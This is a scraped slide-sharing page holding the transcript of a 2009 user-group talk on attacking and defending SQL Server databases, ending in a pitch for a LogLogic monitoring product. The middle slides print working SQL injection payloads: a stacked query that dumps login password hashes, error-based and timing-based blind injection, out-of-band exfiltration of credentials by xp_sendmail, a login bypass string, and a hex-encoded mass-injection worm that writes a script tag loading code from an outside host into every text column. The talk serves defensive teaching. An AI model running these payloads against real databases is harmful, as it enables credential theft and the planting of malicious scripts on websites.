Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence
 
Microsoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud ReadyMicrosoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud Ready
 
Microsoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data ServicesMicrosoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data Services
 
Microsoft SQL Server PowerPivot
Microsoft SQL Server PowerPivotMicrosoft SQL Server PowerPivot
Microsoft SQL Server PowerPivot
 

Recently uploaded

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 

Recently uploaded (20)

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 

LogLogic SQL Server Hacking DBs April09

  • 1. Think like a hacker DB attack vectors, Thwarting techniques Presented to the San Francisco SQL Server User Group presented by Sudha Iyer | Apr 8, 2009 www.BayAreaSQL.org Leader: Mark Ginnebaugh
  • 2. What’s This Presentation All About? Is there an enemy ? Common Database Hacking Techniques Raising the bar for the hackers © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 2
  • 3. Why Protect The Database? Databases hold sensitive information – and lots of it: Customer data, accounts, transactions, payroll, investor data • When a breach occurs, damage is significant: Direct damages and costs • Bad publicity • Regulatory penalties • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 3
  • 4. Some Recent Examples July 2005 – January 2007: TJX 45.7M+ credit/debit card records stolen • Sophisticated attack (WiFi -> Internal Network -> DB) • Result: data sold to data brokers and used in many scams, TJX faces lawsuits and • losses of $25M until May 07 (will grow considerably) July 2007 – Fidelity National Information Services Bank and credit data of 2.3M customers - Stolen by a DBA • And many more breaches… not only in the U.S. (e.g. Home Office breach in the U.K.) Many breaches are unknown or not made public or remain undetected Over 216,686,736 identifiable records in US only - http://www.privacyrights.org/ar/ChronDataBreaches.htm © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 4
  • 5. Know Your Enemy Unauthorized access - not just hackers Too many privileges • Internal attacks Disgruntled employees • Just trying to get the job done • Industrial espionage, Identity theft, etc. • Look around you!!! • External attacks Web or network access © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 5
  • 6. The Problems Does a hacker need DBA access? Myriad of privileges System level, Application level, Data access • Any privilege in the right circumstances can be an issue • Other issues Network issues, incorrect configuration • Too many features – large attack surface • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 6
  • 7. The Problems Most typical problems of real world databases Weak / default passwords for database accounts • Missing patches / patchsets – see • http://en.wikipedia.org/wiki/SQL_slammer_(computer_worm) Unsecure customer / 3rd party code (T-SQL stored • procedures) © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 7
  • 8. Basic Hacking Techniques presented by Sudha Iyer | Apr 8, 2009
  • 9. Discovering databases Reconnaissance: nmap - http://nmap.org/ SQLPing3 - http://sqlsecurity.com/ © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 9
  • 10. Is password the weakest link? Many brute force tools out there • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 10
  • 11. Powerful Tools Are Easily Available © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 11
  • 12. Social Engineering Wait for your DBA to go for a coffee break Go to his desktop Open Management Studio Add yourself as an administrator to the database of your choice This can be easily scripted and put on a USB drive © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 12
  • 13. SQL Injection Wikipedia – is a technique that exploits a security vulnerability occurring in • the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 13
  • 14. SQL Injection Exists in any layer of any application Web Applications • Stored program units • Build in User created Has many forms Extra queries, unions, order by, sub selects • Easily avoided Bind variables, strong typing • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 14
  • 15. SQL Injection Types In band – Use injection to return extra data Part of normal result set (unions) • In error messages • Out of band – Use alternative route like UTL_HTTP, DNS to extract data Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurements and more © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 15
  • 16. SQL Injection In-band select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; select name, password from sys.syslogins where password is not null 14417807 1209 adventure-worksguy1 16 Production Technician - WC60 1 1972-05-15 00:00:00.000 M M 1996-07-31 00:00:00.000 0 21 30 1 AAE1D04A-C237-4974-B4D5-935247737718 2004-07-31 00:00:00.000 虀뛎༷ 醜‫ﬥ‬ 绳 sa 2 쵌藌 街Ḷ왏�컕 test 3 Now, just attack the password hash using either using brute-force or dictionary. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 16
  • 17. SQL Injection In-Band Using errors – inject the following: 1 and 1 in (select @@version) Result is: Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) ' to data type int. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 17
  • 18. SQL Injection Out-of-band Send information via HTTP/SMTP/DNS to an external site: select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null' ; © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 18
  • 19. Blind SQL Injection Example code: If is_srvrolemember('sysdamin') > 0) waitfor delay '0:0:5' If (ascii(substring(@string, @byte, 1)) & (power(2, @bit))) > 0 waitfor '0:0:5' © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 19
  • 20. SQL Injection – Web Application Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = '' © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 20
  • 21. Real World Example Mass SQL worm in the wild since April Enumerates all query/input fields and tries various SQL injection techniques Iterates on all text fields in the database and adds a link to the Jscript Result? Data Leakage … broad daylight! © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 21
  • 22. Real World Example SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C415245204054205641524348415228323535292C4043205641524348415228323535292044454 34C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E61 6D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D33352 04F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7 2204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C45284 04046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D2053455 4205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2 9292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F736 3726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4 04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F 7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC Wow, how to read this? © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 22
  • 23. Real World Example DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(’UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+”<script src=http://www.chkadw.com/b.js></script>”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 23
  • 24. Real World Example The interesting part is here: ’UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR(4000), ['SOME_TEXT_COL']))+”<script src=http://www.chkadw.com/b.js></script>”’ Lesson Learned? Never use NoScript - even for trusted sites © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 24
  • 25. Thwarting these attacks presented by Sudha Iyer | Apr 8, 2009
  • 26. Try the off the shelf tools yourself Think like a hacker Learn about exploits • Always look for security issues • Configuration, permissions, bugs Learn and use available tools nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, etc. • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 26
  • 27. Develop an information security policy ...and enforce it Apply patch sets and upgrades Easier said than done • Check for default and weak passwords regularly Secure the network Valid node checking + firewall • Use encryption • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 27
  • 28. Secure By Default; Secure Coding Practices Install only what you use, remove all else Reduce your attack surface • The least privilege principle Lock down packages • System access, file access, network access Encrypt critical data Use secure coding techniques Bind variables, input validation • Clear ownership of security issues • http://checklists.nist.gov/chklst_detail.cfm?config_id=157 • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 28
  • 29. Publish Coding Standards, Peer Review Avoid hardcoding username/password Wrap sensitive/important program code – even if not really safe Use full qualified names for function and procedure calls Always validate user/database input Be careful with dynamic statements (Cursors, SQL-Statements, …) Be careful with file access Be careful with OS command execution © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 29
  • 30. Deploy Real Tools: Host-based Sensor Technology Host-based All database transactions, Sensor externally or internally initiated, must go through the shared / cache memory Minimal impact on performance – typically less than 5% of a single CPU Stored DBMS Bequeath Proc Local Conn No business interruption (no Shared reboots or restarts) Trigger Memory Listener Supports SQL Server, Oracle, Network Conn Sybase View Data © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 30
  • 31. Granular Policy-based Detection Security policies determined by granular rules: Predefined (Virtual Patching) – zero effort / Wizard-driven templates for • regulations / Administrator-defined Rule Policy Layers Virtual Patching Trigger Action Rule 1 1 Virtual Patching Trigger Action Rule Rule 2 2 Rule Compliance Templates IF Compliance Templates App<>’SAPFinance’ AND object = Rule 3 3 Rule ‘CC_Table’ THEN Community Best Practices Community Best Practices Send HIGH Alert Rule 4 4 Rule Send mail to: security team Terminate User Session Rule 5 5 Customer-Defined Rule Customer-Defined Quarantine User 60 minutes © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 31
  • 32. LogLogic Database Security Manager Meet Compliance Requirements » Privileged user monitoring » Enforce Segregation of duties » Protect sensitive data » Audit trail and reporting » Keep database patches up to date » Compensating control for protecting » unencrypted data Complete Database Security » Protect against internal / external attacks » Cover all copies, locations and platforms » Operate in all environments (encryption, » clustering, virtualization) Defend against all types of attacks » “Always on” protection in real-time » © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 32
  • 33. Integration with LogLogic Log Management Platform Database Security Manager LogLogic Open Log Management Granular policy-based detection Compliance reporting » » Automated database protection Long term archival » » Real-time virtual patching Forensics analysis » » © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 33
  • 34. Questions? presented by Sudha Iyer | Apr 8, 2009